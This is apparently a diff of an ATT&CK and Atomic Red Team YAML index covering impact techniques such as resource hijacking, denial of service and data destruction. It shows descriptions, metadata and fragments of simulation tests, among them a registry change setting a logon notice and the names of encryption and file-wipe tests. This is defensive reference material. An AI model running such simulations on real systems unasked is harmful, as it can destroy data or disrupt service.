       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
       - Pawel Partyka, Microsoft Threat Intelligence
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -114367,10 +115200,9 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
@@ -114433,7 +115265,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1491.001:
     technique:
@@ -114474,7 +115305,7 @@ impact:
         messages. Since internally defacing systems exposes an adversary''s presence,
         it often takes place after other intrusion goals have been accomplished.(Citation:
         Novetta Blockbuster Destructive Malware)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-28T18:55:35.988Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Defacement: Internal Defacement'
       x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -114495,7 +115326,6 @@ impact:
       - Integrity
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1491.001
     atomic_tests:
     - name: Replace Desktop Wallpaper
@@ -114586,6 +115416,155 @@ impact:
           Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force
         name: powershell
         elevation_required: true
+  T1496.004:
+    technique:
+      modified: '2024-10-16T17:59:27.535Z'
+      name: Cloud Service Hijacking
+      description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+        applications to complete resource-intensive tasks, which may impact hosted
+        service availability. \n\nFor example, adversaries may leverage email and
+        messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+        Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+        spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+        messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+        2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+        in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+        AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+        2024)\n\nIn some cases, adversaries may leverage services that the victim
+        is already using. In others, particularly when the service is part of a larger
+        cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+        2024) Leveraging SaaS applications may cause the victim to incur significant
+        financial costs, use up service quotas, and otherwise impact availability. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+      created: '2024-09-25T14:05:59.910Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/004
+        external_id: T1496.004
+      - source_name: SentinelLabs SNS Sender 2024
+        description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+          Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+        url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+      - source_name: Lacework LLMJacking 2024
+        description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+          with Composite Alerts. Retrieved September 25, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+      - source_name: Sysdig LLMJacking 2024
+        description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+          (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+      - source_name: Permiso SES Abuse 2023
+        description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+          25, 2024.
+        url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.001:
+    technique:
+      modified: '2024-10-13T16:58:38.820Z'
+      name: Compute Hijacking
+      description: "Adversaries may leverage the compute resources of co-opted systems
+        to complete resource-intensive tasks, which may impact system and/or hosted
+        service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        is to validate transactions of cryptocurrency networks and earn virtual currency.
+        Adversaries may consume enough system resources to negatively impact and/or
+        cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+        Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+        because of the high potential for available resources, but user endpoint systems
+        may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+        environments may also be targeted due to the ease of deployment via exposed
+        APIs and the potential for scaling mining activities by deploying or compromising
+        multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+        Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+        cryptocurrency mining malware identify then kill off processes for competing
+        malware to ensure it’s not competing for resources.(Citation: Trend Micro
+        War of Crypto Miners)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Network Traffic: Network Connection Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Sensor Health: Host Status'
+      - 'Process: Process Creation'
+      - 'File: File Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+      created: '2024-09-25T13:34:30.100Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/001
+        external_id: T1496.001
+      - source_name: Unit 42 Hildegard Malware
+        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+      - source_name: CloudSploit - Unused AWS Regions
+        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+          Retrieved October 8, 2019.
+        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+          17, 2019.
+        url: https://securelist.com/lazarus-under-the-hood/77908/
+      - source_name: Trend Micro Exposed Docker APIs
+        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+          via Exposed APIs. Retrieved April 6, 2021.
+        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+      - source_name: Trend Micro War of Crypto Miners
+        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+          Miners: A Battle for Resources. Retrieved April 6, 2021.'
+        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1565:
     technique:
       modified: '2024-02-02T17:18:39.004Z'
@@ -114638,11 +115617,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1531:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:35:13.577Z'
       name: Account Access Removal
       description: "Adversaries may interrupt availability of system and network resources
         by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -114665,6 +115643,7 @@ impact:
         phase_name: impact
       x_mitre_contributors:
       - Hubert Mank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -114682,9 +115661,10 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      x_mitre_version: '1.2'
+      - IaaS
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -114710,9 +115690,8 @@ impact:
         url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1531
     atomic_tests:
     - name: Change User Password - Windows
@@ -115042,7 +116021,7 @@ impact:
         NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
         compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
         Part 1)"
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T13:07:10.318Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data Encrypted for Impact
       x_mitre_detection: |-
@@ -115066,7 +116045,6 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1486
     atomic_tests:
     - name: Encrypt files using gpg (FreeBSD/Linux)
@@ -115441,7 +116419,7 @@ impact:
         cleanup_command: "del $env:Userprofile\\Desktop\\akira_readme.txt \ndel c:\\test.*.akira\n"
   T1499:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:56:47.424Z'
       name: Endpoint Denial of Service
       description: |
         Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -115460,7 +116438,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Alfredo Oliveira, Trend Micro
       - David Fiser, @anu4is, Trend Micro
@@ -115477,18 +116454,13 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.1'
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -115512,8 +116484,8 @@ impact:
       - source_name: FSISAC FraudNetDoS September 2012
         description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
           Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
       - source_name: ArsTechnica Great Firewall of China
         description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
           on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -115533,33 +116505,22 @@ impact:
         url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1496:
     technique:
-      modified: '2024-02-14T21:00:00.467Z'
+      modified: '2024-10-13T17:00:09.759Z'
       name: Resource Hijacking
       description: "Adversaries may leverage the resources of co-opted systems to
         complete resource-intensive tasks, which may impact system and/or hosted service
-        availability. \n\nOne common purpose for Resource Hijacking is to validate
-        transactions of cryptocurrency networks and earn virtual currency. Adversaries
-        may consume enough system resources to negatively impact and/or cause affected
-        machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
-        Blog 2017) Servers and cloud-based systems are common targets because of the
-        high potential for available resources, but user endpoint systems may also
-        be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
-        CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
-        due to the ease of deployment via exposed APIs and the potential for scaling
-        mining activities by deploying or compromising multiple containers within
-        an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
-        Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
-        malware identify then kill off processes for competing malware to ensure it’s
-        not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
-        may also use malware that leverages a system's network bandwidth as part of
-        a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
-        campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
-        they may engage in proxyjacking by selling use of the victims' network bandwidth
-        and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+        availability. \n\nResource hijacking may take a number of different forms.
+        For example, adversaries may:\n\n* Leverage compute resources in order to
+        mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+        SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+        quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+        types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+        2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -115570,7 +116531,7 @@ impact:
       - Magno Logan, @magnologan, Trend Micro
       - Vishwas Manral, McAfee
       - Yossi Weizman, Azure Defender Research Team
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Consider monitoring process resource usage to determine anomalous
         activity associated with malicious hijacking of computer resources such as
@@ -115587,8 +116548,11 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.5'
+      - SaaS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'File: File Creation'
@@ -115607,39 +116571,14 @@ impact:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1496
         external_id: T1496
-      - source_name: Unit 42 Hildegard Malware
-        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
-          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
-        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
-      - source_name: CloudSploit - Unused AWS Regions
-        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
-          Retrieved October 8, 2019.
-        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
-      - source_name: Sysdig Proxyjacking
-        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
-          Chat. Retrieved July 6, 2023.
-        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
-      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
-        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
-          17, 2019.
-        url: https://securelist.com/lazarus-under-the-hood/77908/
-      - source_name: Trend Micro Exposed Docker APIs
-        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
-          via Exposed APIs. Retrieved April 6, 2021.
-        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
-      - source_name: Trend Micro War of Crypto Miners
-        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
-          Miners: A Battle for Resources. Retrieved April 6, 2021.'
-        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
-      - source_name: GoBotKR
-        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
-          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
-        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      - source_name: Sysdig Cryptojacking Proxyjacking 2023
+        description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+          and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1496
     atomic_tests:
     - name: FreeBSD/macOS/Linux - Simulate CPU Load with Yes
@@ -115657,62 +116596,61 @@ impact:
         name: sh
   T1565.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
-      created: '2020-03-02T14:27:00.693Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1565.002
-        url: https://attack.mitre.org/techniques/T1565/002
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
-        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:33:33.983Z'
+      name: Transmitted Data Manipulation
       description: |-
         Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
 
         Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Transmitted Data Manipulation
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
         can be difficult without the appropriate tools. In some cases integrity verification
         checks, such as file hashing, may be used on critical files as they transit
         a network. With some critical processes involving transmission of data, manual
         or out-of-band integrity checking may be useful for identifying manipulated
         data. '
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+      created: '2020-03-02T14:27:00.693Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/002
+        external_id: T1565.002
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1485:
     technique:
-      modified: '2023-10-03T17:30:32.192Z'
+      modified: '2024-09-25T20:46:14.641Z'
       name: Data Destruction
       description: |-
         Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
@@ -115721,7 +116659,7 @@ impact:
 
         To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
 
-        In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
+        In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -115747,9 +116685,10 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Deletion'
+      - 'Cloud Storage: Cloud Storage Modification'
       - 'Process: Process Creation'
       - 'File: File Deletion'
       - 'Image: Image Deletion'
@@ -115805,7 +116744,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1485
     atomic_tests:
     - name: Windows - Overwrite file with SysInternals SDelete
@@ -115949,50 +116887,7 @@ impact:
           terraform apply -auto-approve
   T1498:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      - Containers
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Weizman, Azure Defender Research Team
-      - Vishwas Manral, McAfee
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
-      type: attack-pattern
-      created: '2019-04-17T20:23:15.105Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1498
-        url: https://attack.mitre.org/techniques/T1498
-      - source_name: FireEye OpPoisonedHandover February 2016
-        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
-        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
-          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
-          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
-      - source_name: FSISAC FraudNetDoS September 2012
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
-        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
-          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-      - source_name: Symantec DDoS October 2014
-        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
-        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
-          Retrieved April 24, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T16:01:00.510Z'
       name: Network Denial of Service
       description: |-
         Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -116007,6 +116902,10 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_contributors:
+      - Yossi Weizman, Azure Defender Research Team
+      - Vishwas Manral, McAfee
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
         service, but such response time typically requires very aggressive monitoring
@@ -116019,16 +116918,52 @@ impact:
         may be small and the indicator of an event availability of the network or
         service drops. The analysis tools mentioned can then be used to determine
         the type of DoS causing the outage and help with remediation.'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
       x_mitre_impact_type:
       - Availability
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
